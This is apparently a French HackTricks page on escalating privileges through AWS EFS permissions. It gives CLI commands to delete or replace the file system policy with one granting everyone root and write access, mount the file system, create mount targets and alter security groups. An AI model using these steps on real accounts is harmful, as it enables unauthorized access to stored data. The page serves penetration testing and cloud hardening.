AWS - EFS Privesc

Tip

Apprenez & pratiquez AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Soutenez HackTricks

EFS

Plus d’informations sur EFS dans :

AWS - EFS Enum

N’oubliez pas que, pour monter un EFS, vous devez ĂȘtre dans un sous-rĂ©seau oĂč l’EFS est exposĂ© et y avoir accĂšs (security groups). Si c’est le cas, par dĂ©faut, vous pourrez toujours le monter ; cependant, s’il est protĂ©gĂ© par des IAM policies, vous devez disposer des permissions supplĂ©mentaires mentionnĂ©es ici pour y accĂ©der.

elasticfilesystem:DeleteFileSystemPolicy|elasticfilesystem:PutFileSystemPolicy

Avec l’une de ces permissions, un attaquant peut modifier la file system policy pour vous donner l’accĂšs Ă  celle-ci, ou simplement la supprimer afin que l’accĂšs par dĂ©faut soit accordĂ©.

Pour supprimer la policy:

aws efs delete-file-system-policy \
--file-system-id <value>

Pour le changer :

aws efs put-file-system-policy --file-system-id <fs-id> --policy file:///tmp/policy.json

// Give everyone trying to mount it read, write and root access
// policy.json:
{
"Version": "2012-10-17",
"Id": "efs-policy-wizard-059944c6-35e7-4ba0-8e40-6f05302d5763",
"Statement": [
{
"Sid": "efs-statement-2161b2bd-7c59-49d7-9fee-6ea8903e6603",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"elasticfilesystem:ClientRootAccess",
"elasticfilesystem:ClientWrite",
"elasticfilesystem:ClientMount"
],
"Condition": {
"Bool": {
"elasticfilesystem:AccessedViaMountTarget": "true"
}
}
}
]
}

elasticfilesystem:ClientMount|(elasticfilesystem:ClientRootAccess)|(elasticfilesystem:ClientWrite)

Avec cette permission un attaquant pourra monter l’EFS. Si la permission d’écriture n’est pas accordĂ©e par dĂ©faut Ă  tous ceux qui peuvent monter l’EFS, il n’aura que l’accĂšs en lecture.

sudo mkdir /efs
sudo mount -t efs -o tls,iam  <file-system-id/EFS DNS name>:/ /efs/

Les permissions supplĂ©mentaires elasticfilesystem:ClientRootAccess et elasticfilesystem:ClientWrite peuvent ĂȘtre utilisĂ©es pour Ă©crire Ă  l’intĂ©rieur du systĂšme de fichiers aprĂšs son montage et pour accĂ©der Ă  ce systĂšme de fichiers en tant que root.

Impact potentiel : Privesc indirecte en localisant des informations sensibles dans le systĂšme de fichiers.

elasticfilesystem:CreateMountTarget

Si un attaquant se trouve Ă  l’intĂ©rieur d’un sous-rĂ©seau oĂč aucun mount target de l’EFS n’existe, il peut simplement en crĂ©er un dans son sous-rĂ©seau avec ce privilĂšge :

# You need to indicate security groups that will grant the user access to port 2049
aws efs create-mount-target --file-system-id <fs-id> \
--subnet-id <value> \
--security-groups <value>

Impact potentiel : Privesc indirect en localisant des informations sensibles dans le systĂšme de fichiers.

elasticfilesystem:ModifyMountTargetSecurityGroups

Dans un scĂ©nario oĂč un attaquant dĂ©couvre que l’EFS a un mount target dans son sous-rĂ©seau mais aucun security group n’autorise le trafic, il pourrait simplement changer cela en modifiant les security groups sĂ©lectionnĂ©s :

aws efs modify-mount-target-security-groups \
--mount-target-id <value> \
--security-groups <value>

Impact potentiel: Privesc indirect en localisant des informations sensibles dans le systĂšme de fichiers.

Tip

Apprenez & pratiquez AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Soutenez HackTricks